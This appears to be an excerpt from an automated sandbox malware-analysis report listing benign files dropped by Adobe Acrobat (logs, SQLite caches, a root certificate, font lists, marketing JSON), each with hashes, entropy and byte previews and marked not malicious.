                                                                  SSDEEP:6:iOp+X+QFlL+q2Pwkn2nKuAl9OmbzNMxIFUtL+XdHz1Zmwl+XK2LVkwOwkn2nKuAo:7po/OvYfHAa8jFUtLodT1/loKi5JfHAo
                                                                  MD5:945CFF6CA0F48CD112A3D6F370DFB79D
                                                                  SHA1:69C185887F0FB61A451300A329185D76A28C79A6
                                                                  SHA-256:C752622FE48176E0B6490B3D183DCF198A9BC2BC8775F7F0F27E8A5B5009C959
                                                                  SHA-512:AEE153C1589F5B103D17375394C0E8A3721BF43C12B3A11CFDE0431452CEAB7DFF5ACA63A66AB5880275211B9527D6724CCBACE4F5674C8BF14E2A48D3010CC8
                                                                  Malicious:false
                                                                  Preview:2025/01/07-12:13:02.887 1ee8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-12:13:02.915 1ee8 Recovering log #3.2025/01/07-12:13:02.924 1ee8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                  Category:dropped
                                                                  Size (bytes):66934
                                                                  Entropy (8bit):1.7544134515160215
                                                                  Encrypted:false
                                                                  SSDEEP:192:8iRvM0C0BLs5q/z4molmRy8OazjL+ZdTkdAw888888H+88838Sak888888H+888x:8iRLfG2gazjL+3TkdApSsWkvXQV
                                                                  MD5:A61E2E877B9BEBF90983EE1455F6C731
                                                                  SHA1:C0C641D144A7D5BA73C505EBE6EA34D92EF2335F
                                                                  SHA-256:FB3D9E842D9E3703AEE31D85DB37A454460C35575955661DF1961DAE53089D44
                                                                  SHA-512:B3B9B8924D74208FD40AE031886AA4C87158CCE498B5FCC0925C87E7D42543A9B7E0560229319A024424B3D73D5723E631113D310DE09CF0D28E68966044B1C1
                                                                  Malicious:false
                                                                  Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                  Category:dropped
                                                                  Size (bytes):86016
                                                                  Entropy (8bit):4.44478430438147
                                                                  Encrypted:false
                                                                  SSDEEP:384:yezci5tuiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rBs3OazzU89UTTgUL
                                                                  MD5:DFE515C0EB39A9DD00DF4866A443ADCB
                                                                  SHA1:740D8EF18F30BB253A3E11C4BB650C250FE721EA
                                                                  SHA-256:18E4F3C1510ABC67E482F3FE8673E13053CC75857747DB6F504E7979736F41E0
                                                                  SHA-512:75F82BDBFA59F6BF0067C617D73CD4DF23E4456CCC8BD8D9D9650AFB1DBF97597DFAC8421724500A3F3269E6BB68C59E78F979323CECDC3C9710C9E54BF201ED
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):3.7727105304855
                                                                  Encrypted:false
                                                                  SSDEEP:48:7MVp/E2ioyVbioy9oWoy1Cwoy1PKOioy1noy1AYoy1Wioy1hioybioyboy1noy12:7ipjubFSXKQiZb9IVXEBodRBkc
                                                                  MD5:568AF3B61912297C17EAE65ED6972EAA
                                                                  SHA1:E6BEC052DA0C02A42331CF996DAA68DA345C202D
                                                                  SHA-256:C60B4D5B941F40F04DD140133C814AA9B528722DD696F499CF48CBCD75F754C9
                                                                  SHA-512:F53FCEA7937D6DEAAE82E6CD2DBC6920E7EC98BE050F697D16D252D170886B556C7970A5A4E54EB5599E43741AAAD8D61A7D6772FA2209094FCCB6D0461AFB50
                                                                  Malicious:false
                                                                  Preview:.... .c.....,.u}...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Certificate, Version=3
                                                                  Category:dropped
                                                                  Size (bytes):1391
                                                                  Entropy (8bit):7.705940075877404
                                                                  Encrypted:false
                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                  Malicious:false
                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):192
                                                                  Entropy (8bit):2.752969867432539
                                                                  Encrypted:false
                                                                  SSDEEP:3:kkFklV2GfllXlE/HT8k8HlrtNNX8RolJuRdxLlGB9lQRYwpDdt:kK3XT8HNMa8RdWBwRd
                                                                  MD5:C3A798BA28BC12D83EB6965FEBB011A4
                                                                  SHA1:4955C7B76F9D1B3FFF92DA3F2177E31B6920B4DD
                                                                  SHA-256:0233221A43036B59A9F1D3CE899BF3779974FE187B278D06E2589E419926D356
                                                                  SHA-512:9F89DE1CF4BF8345C74961B5AC2E5EA0DEBA2B88170465D6EBA58BEEDA45935C13DF4AF61BD7CAF5C5A42AD745C52E07013768E06A65B9C4F5C91B2779729424
                                                                  Malicious:false
                                                                  Preview:p...... ...........p'a..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.2340889495313987
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKty9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:VtDImsLNkPlE99SNxAhUe/3
                                                                  MD5:F2998A022F98D9D9DD6633209970DCA0
                                                                  SHA1:48016D3F1A6E8211C3B4B73A74E374EF2E69ED15
                                                                  SHA-256:C0B8F0021EECE1C1A28B6BBA6689738834BD36CF2A39C1361D0FDF03F3634347
                                                                  SHA-512:8BA3B7BCBFA4477F5A626D8BD9F6938F9453B9408402FCFA52F2A82F909E2D32627E018CD6E2B6FF5B240EE118705D13261B179D2396999147A89F7AD6F9B3AF
                                                                  Malicious:false
                                                                  Preview:p...... .........._.'a..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):1233
                                                                  Entropy (8bit):5.233980037532449
                                                                  Encrypted:false
                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                  Malicious:false
                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PostScript document text
                                                                  Category:dropped
                                                                  Size (bytes):10880
                                                                  Entropy (8bit):5.214360287289079
                                                                  Encrypted:false
                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                  Malicious:false
                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.3567434671151055
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJM3g98kUwPeUkwRe9:YvXKXmapj2Zc0vYGMbLUkee9
                                                                  MD5:B9BBD79E108A3EDE650B19B9A53EED3C
                                                                  SHA1:6D02D3C1C712BDD96AFFAED608B2F777A9F20ACD
                                                                  SHA-256:8DBC5832E911452B4A83265778E8E743FE8F85DB04B86B0D58827B4E062D4DA8
                                                                  SHA-512:D17DF32178F5350689A2D8E191A2740850C974CBFCD6A180FE94B132BB2ACEB3F2A7FE189CD75052BBD9AE06B115E05928B4017DB5600F334DBEC97E862B1179
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.30509961962038
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfBoTfXpnrPeUkwRe9:YvXKXmapj2Zc0vYGWTfXcUkee9
                                                                  MD5:9BDBCD33908F199CD1DCEB78730013ED
                                                                  SHA1:F253C162B0FDE40DF0E47F489A8987F8A2352119
                                                                  SHA-256:CFE9A6A32A879CA973C3B43C6C780C1161DF89FCDDD577473A3FD402DC47E8AD
                                                                  SHA-512:D0C1657D9CAD87AEDC07C3144114C5E3AF5752F0610727947EB6DDDFE8BF64E4272831F82757CB7C63F422B977A19A01312503B35D510517E00B602075D22FFE
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.28294971319745
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfBD2G6UpnrPeUkwRe9:YvXKXmapj2Zc0vYGR22cUkee9
                                                                  MD5:4AA37A72F022B460CBA2D73CD3CE05F0
                                                                  SHA1:3FE13212728343855B58242A0CA02C1B9D257E62
                                                                  SHA-256:B0A0D4A078AC2D42340E2740A5E2A085BCC0C6B586C27F6F8BA28705300AEB89
                                                                  SHA-512:83DA606F681363FD83A0F46024E2093273FD55A46E002057BADEC6AAEB9FED7E27C44D502E83700282117C8BB3D717DF7026A7F35A27F873ACC74AC81BD01BFC
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):285
                                                                  Entropy (8bit):5.343521695443525
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfPmwrPeUkwRe9:YvXKXmapj2Zc0vYGH56Ukee9
                                                                  MD5:1B980A67BE66004C7851CD8BCD36B6E8
                                                                  SHA1:37D352127CD486DC9283C914D8E4762769E44F33
                                                                  SHA-256:09D30BF564A190E5817FCC9FAC14622D755A076CE80506E16CED8FEB77FA0648
                                                                  SHA-512:958AC8A5E7A0D6BE20745DD92EEB6626245DD79E1604856FD1AC47CF48257726FB2C7426EE52B44C34EFC56D371B0CF1DBAA9DC60FA993CB0E7DE4AA09D8757D
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1123
                                                                  Entropy (8bit):5.686962782900186
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6X2zv1pLgE9cQx8LennAvzBvkn0RCmK8czOCCSr:Yv1thgy6SAFv5Ah8cv/r
                                                                  MD5:43AA1239E1BCDF60D1C7B5541D895E52
                                                                  SHA1:F6F544B2CFCB033BD1AED8AC6D0C9FB6C1E4E3F2
                                                                  SHA-256:76542A9D5A402E182E30B07CEF614D84593055762A428D1BB225B17F0240991F
                                                                  SHA-512:BC5CEE918B4CF1956AAEC48DBAA7F9A02ECBE9A011585EFB8F26EE737FDDC6CDAB3F240777270D1A30CB77F89CAFB75C0A7E0D9060A7361CD15287802935D47D
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.2905669118716245
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJf8dPeUkwRe9:YvXKXmapj2Zc0vYGU8Ukee9
                                                                  MD5:BBDD1617F3D0360A2B3AFF15D5A14CDB
                                                                  SHA1:2FEB94BF407831084A24EBADA136CFE01105E6F6
                                                                  SHA-256:05213026ADB7641D6091C16CE18F4555292683DEDFB47EACD78B6AB4BDEA6CFB
                                                                  SHA-512:7219318E7DEDDB795B13DC8E13EE14FDEDF1BDB67AAAB1A87FAC3366CBFFA7E00AE55EEA2BF479C83506AA83B0D6E1EF57BD81A262577695CFE0B8E37186548A
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.2951460615757036
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfQ1rPeUkwRe9:YvXKXmapj2Zc0vYGY16Ukee9
                                                                  MD5:39A77B64C87F0280369EFD18935BB268
                                                                  SHA1:B748C8CBE1E1CC68AA3ACC9CD1B46CEE86B0E350
                                                                  SHA-256:7AEFFBF1DB0535323C0D5305A1D57F4A7BCEA0B4FDB0AB7C80FDAD318088EB90
                                                                  SHA-512:6E9293A9454A91A2EDED9121991F79B71D5B2903D3F21421B6906E3664150140BE6A39B80850BB18D9E6C6BD527AB2A5888E64C83F35BF324DF6E77B57D53447
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.301329613240316
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfFldPeUkwRe9:YvXKXmapj2Zc0vYGz8Ukee9
                                                                  MD5:BE20D9BB711CB0B8B694F36209C1E05E
                                                                  SHA1:987A4A71C31757B5E58C25FA7895C0E3B73C9AFF
                                                                  SHA-256:E6A0B8A9F66283464776D0A748B9DAE2D5F93B56A4E2A38932DB414A4618BDD8
                                                                  SHA-512:B11D875EB1D194E59B72D31465D5152EF2C971289B23D6624BD71C0EE1C9270344109D41EE682A88278F165DC695889AB77C525B50221647234380128B6C4B30
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.316739125876475
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfzdPeUkwRe9:YvXKXmapj2Zc0vYGb8Ukee9
                                                                  MD5:172CB7C20E31324DC248C319CE4997DD
                                                                  SHA1:8DE07EFEBAED089C916FEF88C75BF4CC4869DF87
                                                                  SHA-256:405EAD1E95C645272CF4E29B04BCD2A733A7869DB19B041B73B2205B1A530808
                                                                  SHA-512:986A8B16C916D8716907D8E903E49668F820A4293C373705AEB032765575834BDCA15ED4E80013AD5756AA5C1764E6FF2D5D98A1E0FE3215EF3EEB83B07DA9C3
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.297605858388944
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfYdPeUkwRe9:YvXKXmapj2Zc0vYGg8Ukee9
                                                                  MD5:C00348D0FFF366DBBD3C3DC1D25C4F27
                                                                  SHA1:D9B38D3505E70F643AEAEC2034772700888BA85D
                                                                  SHA-256:E4D3ED1653CAE57C19E20EBA36988836AEA7FBE06B3FF2E9456A00133301B8FE
                                                                  SHA-512:69616DF1E39684A74E0A6BE2EF0A575D778FB7B7835023B5631DCDBB4585A3E1E8D14BAEB68DC4C80C99A86BC34D78C908C179300D45BD66F62719F84CFE6533
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):5.283614080831342
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJf+dPeUkwRe9:YvXKXmapj2Zc0vYG28Ukee9
                                                                  MD5:603A1EC52A772EB10726D98DCB506BAE
                                                                  SHA1:3304807BD29E60A5B6D6DC8D3393BBE6836E4F41
                                                                  SHA-256:26B218C032B608BDCE8687596B75723AE0D0891BD847BB202A65ABD29DD93B36
                                                                  SHA-512:C756D6C915BF5CAB082AE9F82AF0C58F9FC65FCBC2873D6B34B9F069551AE1314E55D512A3F5D37958B35E22A2F81AE1D68F4C97906A3E335FBD2763FCD24E22
                                                                  Malicious:false
